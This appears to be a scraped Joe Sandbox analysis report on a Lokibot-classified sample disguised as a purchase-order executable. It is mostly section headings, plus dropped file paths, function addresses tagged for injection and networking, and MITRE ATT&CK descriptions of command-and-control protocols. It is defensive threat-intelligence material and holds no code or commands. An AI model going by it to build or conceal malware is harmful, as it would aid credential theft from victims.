Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report (PO403810)_VOLEX_doc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\(PO403810)_VOLEX_doc.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
(PO403810)_VOLEX_doc.exe

Function 017454F7 Relevance: 1.7, APIs: 1, Instructions: 238
processCOMMON

Function 01745500 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 01745B60 Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Function 01745B68 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 01745941 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Function 01745948 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 01745A58 Relevance: 1.6, APIs: 1, Instructions: 97
memoryCOMMON

Function 01745A60 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 01745831 Relevance: 1.6, APIs: 1, Instructions: 90
threadCOMMON

Function 01745838 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Function 01745CA1 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 01745CA8 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre